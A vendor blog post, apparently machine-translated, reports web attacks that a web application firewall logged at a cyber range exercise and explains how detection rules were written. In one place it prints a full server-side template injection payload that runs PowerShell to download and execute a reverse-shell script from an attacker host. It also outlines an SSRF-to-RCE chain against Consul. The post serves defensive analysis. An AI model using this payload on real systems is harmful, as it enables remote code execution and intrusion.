WAF Verdict, or What Happened to Web Resources of Companies’ Digital Twins at The Standoff

At the last The Standoff, we, the team PT Expert Security Center, in parallel with the participants in the confrontation from the side of the defense, we monitored the infrastructure of the site and individual offices of the digital copy of the metropolis deployed on our cyber polygon. For this we deployed additional security operations center (SOC), which, as it were, covered the entire infrastructure, due to which it “saw” all the activities of The Standoff participants and even a little more. One of the tools of this SOC was PT Application Firewall – a firewall of the web application level (about the results of the work of another of the tools of our SOC – PT Sandbox – read in one of our previous articles). Below we will focus exclusively on what was happening on the site from the point of view of the web and what targets were chosen by the attacking teams.

General attack statistics

As part of The Standoff, we monitored attacks on the portal of the site itself, as well as on 30 web resources included in the gaming infrastructure of the training ground. These were resources used both in the main game (Meters of the 25 Hours office – a resource for transmitting meter readings, Consul for Nuft – a service management platform, which will be discussed below), and in bug bounty (for example, CMS Umbraco for Bank of FF, Mantis Bugtracker for 25 Hours is a bug tracking system for software products, rConfir RCE is a network configuration management service for the Big Bro Group). Read teams received points for implementing risks, as well as searching for vulnerabilities in systems and reporting.

Who was who in the cyber polygon:

– Heavy Ship Logistics – the company that operated the airport, railway station, seaport;

– 25 Hours – a company that managed an amusement park, a business center, a traffic light network;

– Tube – a company that managed a TV and radio company, a gas distribution station, a transformer substation;

– Nuft – an organization in charge of an oil field and a petrochemical plant;

– Big Bro Group – power station;

– Bank of FF – bank.

Resources were evenly distributed between sites – both in terms of complexity and purpose. In particular, the applications participating in the bug bounty, having two interfaces each and looking at the internal network of the virtual office, were the entry point for the implementation of risks within the companies of the digital city. There were 13 such applications, with six of them supposed to achieve the bug bounty goal from within the office infrastructure. The rest of the applications were “dead ends”, that is, they were actually single end targets with fairly simple tasks to exploit various vulnerabilities (for example, the well-known RCE in Flack or BookStore SQL Injection – often proposed for solution in capture the flag). We monitored all these portals and applications exclusively in monitoring mode and recorded attacks on 29 out of 30 web applications available in the infrastructure (one of the resources had the opportunity for logical attacks that could only be carried out from the bank’s network). The only defense the defenders had was the web application firewall.

The Standoff portal was also launched behind the PT Application Firewall – but in blocking mode and in order to prevent possible attacks on the infrastructure supporting the event from the Internet.

Figure 1. Distribution of attacks by game days
Figure 1. Distribution of attacks by gaming days

In fig. 1 shows the distribution of attacks by gaming days. Gray color indicates specific generated rules for the event, yellow – low-level attacks, orange – medium, red – high. The latter often tell us about certain commands running on the attacked node, or about exploited vulnerabilities. Next, we will use these same colors.

The list of the most frequently performed attacks is given below (the number of attacks for the entire period of The Standoff is indicated from 12:00 on November 12 to 14:00 on November 17).

Figure 2. List of the most common attacks
Figure 2. List of the most common attacks

The real picture of the attacks carried out and the monitoring results obtained in PT Application Firewall differ, for example, because vulnerabilities of some applications were exploited from within the perimeter from the internal addresses of the protection office. Such attacks can be detected by internal audit tools. In addition, in any of the applications, attacks other than those intended for the game can be used, if the final goal was not to exploit the ultimate vulnerability. Data on such attacks may not be fully recorded, may not be reflected in the logs.

Most often, attackers targeted applications of the Tube and Bank of FF offices: CMS Made Simple (CMS), bbord (virtual photo gallery), CMS Umbraco, Prestoshop (e-commerce site), Avideo encoder (video decoding resource), FHEM tomcat (smart home system) ), Consul, openEMR (Electronic Health Record), ATutor (Learning Management System) and rConfig.

How to open doors to infrastructure via the web

During the monitoring, we analyzed the tools used by the attackers to pass the perimeter. Along with traditional port sniffing with nmap and tools like the Burp Suite, self-written scripts in Python and Go were very popular: they made up almost a quarter of the tools used and were often used on the basis of tools already available to attackers like Metasploit. Applications on the perimeters of the defenders were actively fuzzed using the built-in burp suite modules, modules for Metasploit, the Responder toolkit.

Of the 30 tasks laid down on the perimeter, all tasks of a low level of complexity were solved, 5 of 6 of an average and 2 of 6 of an advanced one. Problems of medium and high level of complexity are of the greatest interest, since they lead to the entrance to the infrastructure for further implementation of risks – and, of course, allow you to score the highest number of points.

Here are some examples of the most interesting tasks.

The task “Entering the perimeter of the city management company 25 Hours” was implemented through the Meters application. This is a site deployed to transmit water and electricity meter readings online. Since the application uses expressions in the HubL language, {{}} is an expression processor. Anything that falls within the curly braces is replaced with the actual values ​​when processed. The attack is implemented as follows: a vulnerability is checked using the vector {{77}} and the like, that is, in fact, calculation 7 is started7.

Figure 3. Server Side Template Injection (SSTI) detection in PT Application Firewall for Meters application (detection rule adapted to The Standoff)
Figure 3. Server Side Template Injection (SSTI) detection in PT Application Firewall for Meters application (detection rule adapted to The Standoff)
Figure 4. Distribution of SSTI attacks for the Meters application
Figure 4. Distribution of SSTI attacks for the Meters application

To implement a real attack, you need to execute a request on the front-end of the application:

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder("cmd.exe","/c","powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.

Which was done by the two attacking teams.

This attack is interesting from the point of view that it can serve as a starting point for the implementation of vectors in an amusement park of a digital city (for example, to change the rotation speed of the Ferris wheel), in the city as a whole (to disrupt the traffic light network), or to steal personal data of citizens …

Another interesting task is the attack implemented by Nuft through the Consul application. An external service contains software for bypassing locks. Using it, you can implement a Server Side Request Forgery attack, which is carried out over the Gopher protocol and is sent using the PUT method to the port listening by the service.

The status 200 received after the manipulation indicates a successful attack.

Figure 5. Attack on the Consul application (RCE).
Figure 5. Attack on the Consul application (RCE).

Gaining access and fixing on this node made it possible to carry out attacks on such objects of a digital city as an oil field (an example of a target is the technological process of transporting oil products to storage facilities) or a petrochemical plant (an example of a target is the processes of producing chemicals).

To detect some types of attacks and identify exploited vulnerabilities, we set up responses (elimination of false positive) and wrote additional rules for detecting attacks. Let’s consider the principles of writing such rules.

To fix the main types of attacks and identify them, proofs of the concept of carrying out an attack are considered, specifying the path along which the attack is carried out. The rule is formed on the basis of the specified path, parameter, into which this or that combination of symbols, link or code is embedded.

For example, in the CMS Umbraco (used in the infrastructure of the Bank of FF company) there is a vulnerability, the exploitation of which is carried out from under an authenticated user using the POST method; by fixing the operating path and operating parameters, the attack was fixed.

Figure 6. The rule for detecting an attack in web traffic for CMS Umbraco
Figure 6. Web traffic detection rule for CMS Umbraco

It is easy to guess that for Meters, the attack on which was described above, a rule is similarly formed based on the input described above – the interpretation and execution of commands in curly braces in one of three parameters.

Figure 7. Rule for detecting attacks on Meters for commands executed by the interpreter in {}
Figure 7. Rule for detecting attacks on Meters for commands executed by the interpreter in {}

The condition of using the final application and the request path is applied when it is necessary to refer to a specific path.

In the course of this analysis of application vulnerabilities, about 30 rules were pre-formed. These rules take into account the general trend, but do not always cover all methods of implementing an attack on a particular application. In addition to the known and predetermined attack vectors, workarounds are often used. For example, instead of exploiting a vulnerability at the perimeter in order to obtain data from the database, the attackers gained access via an alternative protocol already inside the network (ODBC) or made a backup and “pulled” it through administrative shared folders.


We see that often attackers (including those within The Standoff) use attacks on applications published on the perimeter in order to gain primary access and anchor them in the infrastructure. The main means of protecting such applications are solutions of the web application firewall class. At the cyber polygon, PT Application Firewall has shown its effectiveness in tracking various attacks on the perimeter, including allowing you to create your own rules for tracking attacks. Due to the user-friendly interface and the display of both requests and application responses, the product allowed us to effectively filter out false positives, as well as assess the range of tools used by attackers.

Positive Technologies (PT Expert Security Center)

Similar Posts

Leave a Reply